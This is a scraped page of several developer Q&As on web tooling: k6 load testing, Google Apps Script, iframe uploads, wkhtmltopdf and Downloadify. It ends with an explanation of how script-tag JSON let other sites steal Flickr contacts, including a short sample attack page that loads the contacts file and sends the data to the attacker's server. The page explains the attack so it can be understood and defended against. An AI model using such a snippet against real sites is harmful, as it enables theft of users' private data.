New to k6, working with a web application that presents a spinner briefly on the home page while css and js files load.
Once the files are loaded and scripts are available, a login form is added (replacing the spinner).
With k6, is there a way to wait until a specific body element (the login form) is available in the body before continuing with the next step (ie. populating the username and pwd and submitting the form to login)?
Currently, when I review the response body, I see the spinner element only. Adding a delay does not appear to affect the body returned, even though the login form should, in theory, have been added to the page.
If the element is added to the body after the initial page load, will it be detected by k6 and made available in the response?
Thanks for your help.
Bill
k6 doesn't work like a browser - the load tests are written in JavaScript, but when you request an HTML file, the JavaScript in that file isn't executed. It usually can't be executed even with eval() or something like that, since k6 doesn't have a DOM or any of the usual browser APIs. So you have to explicitly specify any HTTP requests you want your k6 scripts to make, and in your case I assume that the spinner and login form are generated by a JavaScript somewhere in the home page.
To simplify working with such highly dynamic websites when you use k6, you can use the site normally in your browser, record the browser session as a .har file and export it, and then convert that .har file to a k6 script with the k6 convert command like this: k6 convert session.har -O k6_script.js. You can find more information about the whole process here.
k6 doesn't execute client side code, nor does it render anything. It makes requests against the target system and loads them. This makes it efficient to make a large number of reqeusts, but creates new things that must be solved in certain cases.
Capturing all the requests necessary - typically using the k6 convert to convert a HAR file works well to give a foundation of a script. I suggest using the other options in converting to limit any third party requests. e.g. --only or --skip. More info here: https://support.loadimpact.com/4.0/how-to-tutorials/how-to-convert-har-to-k6-test/
Since you recorded your browser session, if your application/site uses anything to prevent CSRF attacks, you must handle those values/correlate them. e.g. .NET sites use VIEWSTATE, if you were testing a .NET app, you would need to instruct the VUs to extract the viewstate from the response body and reuse it in your requests that require it
In a similar vein to point 2, if you are submitting a form, you probably don't want to utilize the same details over and over again. That typically just tests how well your system can cache or results in failing requests (if you are logging in and your system doesn't support concurrent logins for the same user as one example). k6 is able to utilize CSV or JSON data as a source for data parameterization. You can also generate some of this inline if it's not too complex. Some examples are here: https://docs.k6.io/docs/open-filepath-mode
Related
I currently have a website that automates Instagram actions: http://instapromobiz.com. It is almost all javascript based, with some php to post to databases. Users login and an entry is created in a mySQL database, containing their username and how many credits they have (1 credit = 1 action). Then users add tags and press start, then the javascript makes requests via Instagrams API, and ajax+php is used to update their database.
The issue is that when the user leaves the page, or even refreshes it, the script will stop. Otherwise it will run forever.
I have a javascript file that contains all the functions needed to run the script until the user stops it.
My question is, can I use Google Apps Scripts to host this .js file so that when the user leaves the page the script continues to run. I've uploaded the code and published it, but I can't figure out how to access it from an external website.
node.js is out of the question, and I'd rather not convert the whole site to php(I don't know php well) and a cron wont work because of all the javascript.
Any help would be great, thanks!
Apps Script is going to be limited to a 5 minute execution time. You could create time based triggers to contend with that functionality to some extent, but the script will stop 5 minutes after being invoked.
If you still think Apps Script is a good fit, you would just need to deploy your script as a web app, and utilize a doGet(event) function or a doPost(event) function to receive the request from your external application. If you need to return content, there is ContentService to help facilitate that part of the process.
To maintain the different data points for each user, you will need to utilize ProertiesService.getUserProperties(), to store persistent string values for each user.
The other part of Apps Script that may come into play with your Javascript, is that Apps Script uses caja sanitization for javascript (just something to be mindful of, if you run into issues).
If you MUST defeat the execution time problem in google apps script. You can monitor the execution time and at a certain point before time expires invoke the script recursively and pass it the parameter of wherever it left off.
I need to upload a file with a form in a single-page (AJAX) web application, but the file is useless without the rest of the data on the form in that panel. There are only three INPUTs, but one can be a quite lengthy text area. How can I capture this?
If I upload the file using an isolated AJAX file-upload technique (like the Fine Uploader http://fineuploader.com/ widget), then I have to handle two counter-intuitive elements:
CLIENT: The user transmits the file, the main part of the transaction, before actually approving the transaction. They then wait for this to complete, even if they decline to continue. The UI must disable screen elements to prevent the scenario where a client might submit the associated data before or during the file upload. It's extra effort to send the file at the wrong point in the process.
SERVER: It requires a ticketed-cache. The back-end must cache the uploaded file and provide a ticket to the client for this file. The client must send this ticket with the upcoming request. Ideally, the cache also should clean up old tickets under various circumstances, such as if the form is cancelled, another file is uploaded, or the user session times out. More extra work (although this ticketed-cache functionality would be nice to have in my server).
Is it a sensible solution to instead place the whole form in an IFRAME? Will I have problems manipulating that and making it appear to be a well-integrated part of the single-page application? I've always stayed away from them in the past.
My platform is jQuery, ASP.NET MVC, the usual browsers (plus probably mobile).
This was pretty easily resolved in my case by simply setting the target of the form post, including file and text inputs, to a non-visible iframe, and watching for the iframe onload event.
I'm having issues trying to figure out how to generate on server side a PDF from a javascript-heavy webpage that is served from Tomcat (the application is Pentaho CE). The content is a dashboard that responds to user interaction. Pentaho (the application) replaces divs dynamically with various content through AJAX calls. I'd like to export to pdf whatever state the user has the dashboard at. There are no restrictions on what I can put on the server, but I need to avoid having the client install anything.
I've taken a look at this, along with a bunch of other google-fu:
JSP/HTML Page to PDF conversion
wkhtmltopdf seems to be a popular choice; before I start banging my head against it, I have a few questions:
Can wkhtmltopdf handle going to password protected jsps where authentication is handled by the application? Would the dynamically loaded divs break it?
Is there a way to perhaps return the client view to the server for processing? I read about screen capturing...
Another option that could work out would be to automate a local access to the dashboard on the server through a server-hosted web browser and generate a PDF that way...is this possible, given the constraints of Tomcat and password protection that's handled by the application? The javascript components that Pentaho generates cannot be accessed outside of the application.
Thanks!
EDIT:
Good news! wkhtmltopdf works! Kind of. I got past the password authentication through putting the login details through a query string, and I'm getting a pdf of the correct page now. The issue is that no javascript components are showing up... (they work for pages like yahoo.com, so maybe I'm missing something here).
If you have a lot of AJAX calls you should wait for them. Use the --javascript-delay x argument, where is x is the time to wait.
All my research so far suggests this can't be done, but I'm hoping someone here has some cunning ideas.
I have a form on a website which allows users to bulk upload lots of URLs to add to a list on the server. There's quite a lot of server-side processing to do on each URL, so to avoid timeouts and to display progress, I've implemented the upload using jQuery to submit the URLs one at a time using ajax.
This is all working nicely. However, part of the processing on each URL is deduplicating it against the complete list. The ajax call returns a status indicating either a successful upload or a rejection due to duplication. As the upload progresses, I tell the user how many URLs have been rejected as duplicates (along with overall progress and ETA).
The problem now is how to give the user a complete list of the failed duplicate URLs. I've kept them in an array in my jQuery, and would like the user to be able to click on a link on the form to download a text file containing those URLs. Is this possible just using client-side processing?
The server-side processing basically handles a single keyword at a time. I'd rather not have to store the duplicates in a database table with some kind of session key which gets sent with every ajax call, and is then used at the end to generate the text file server-side (and then gets cleaned up some time later). I can see how to do this, but it seems very clunky and a bit 20th century.
I haven't used it myself yet, but Downloadify was built for exactly this purpose I think.
Downloadify is a tiny JavaScript + Flash library that enables the generation and saving of files on the fly, in the browser, without server interaction.
It was created by Doug Neiner who is also pretty active on Stack Overflow.
It needs Flash 10 to work.
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large
string manipulation was the problem
with the last approach, we switched
from using Ajax to instead fetching
the data using a dynamically generated
script tag. This means that the
contact data was never treated as
string, and was instead executed as
soon as it was downloaded, just like
any other JavaScript file. The
difference in performance was
shocking: 89ms to parse 10,000
contacts (a reduction of 3 orders of
magnitude), while the smallest case of
172 contacts only took 6ms. The parse
time per contact actually decreased
the larger the list became. This
approach looked perfect, except for
one thing: in order for this JSON to
be executed, we had to wrap it in a
callback method. Since it’s executable
code, any website in the world could
use the same approach to download a
Flickr member’s contact list. This was
a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question and this exact sort of exploit was once used to steal contact lists from gmail.
Whenever a browser fetches data from a domain, it send across any cookie data that the site has set. This cookie data can then used to authenticate the user, and fetch any specific user data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
In plain english:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.